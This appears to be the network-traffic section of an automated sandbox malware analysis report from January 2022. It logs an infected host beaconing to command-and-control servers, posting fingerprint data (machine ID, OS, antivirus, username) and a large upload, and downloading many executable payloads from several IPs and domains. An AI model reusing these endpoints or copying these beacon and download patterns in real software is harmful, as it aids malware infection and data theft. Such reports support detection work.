                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0 (this identical request is repeated 5 times in succession)
                          Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 128 | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/bd39b08a69ef2a6dac4b951657d49c6ecf7db331 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0 (this identical request is repeated 6 times in succession)
                          Source: global traffic | HTTP traffic detected: GET /1.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                          Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0 (this identical request is repeated 5 times in succession)
                          Source: global traffic | HTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----daabb92f8006f1c30ce11b2370aba5a4 | Host: 185.215.113.35 | Content-Length: 96048 | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0 (this identical request is repeated 11 times in succession)
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:15 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:18 GMTContent-Type: application/x-msdos-programContent-Length: 320000Connection: closeLast-Modified: Fri, 14 Jan 2022 11:29:01 GMTETag: "4e200-5d5891c0fb88d"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:22 GMTContent-Type: application/x-msdos-programContent-Length: 323072Connection: closeLast-Modified: Fri, 14 Jan 2022 11:29:01 GMTETag: "4ee00-5d5891c0e418d"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:02 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:11 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:16 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 11:02:40 GMTETag: "57200-5d588bdcf8dca"Accept-Ranges: bytesContent-Length: 356864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:30:18 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:24 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Thu, 13 Jan 2022 16:32:58 GMTETag: "6e600-5d5793d3df2ef"Accept-Ranges: bytesContent-Length: 452096Content-Type: application/x-msdownload
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:25 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMTETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648Content-Type: application/x-msdownload
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrooukv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxyqqf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dutgomfkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qwfulsm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxkloxn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hopcq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocnbwlevej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdffxf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psgcnvvm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxjxd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpabshq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ubyvpwxipt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxnotaacu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnpyohcdyx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://byfupx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iijrpdo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ntsddipn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vkaflekmve.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://seaed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obclg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pgydqikexd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gminomh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgajiadc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvuvc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdosgx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://npqwstsduq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouyysee.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtqpowrk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhpljg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipycpcfbe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdstpsloir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tfxyjpgh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycdbyxqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcfxlgitg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afdvsashlg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kapjpsnnjq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcsjausffk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djmmsjo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipjoaoftf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdkmuxkbh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vomuxg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjenisnthl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pixmwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwbuboe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pylkam.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdhqx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pslqekdvh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecicwppql.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlwsaw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krrkfa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gfydmobm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhdak.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://assuf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rblisqqaii.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnvwvqck.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vltihla.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnqlcbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flqhri.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://poqgfb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oycnsawak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6236.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylanbcfwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
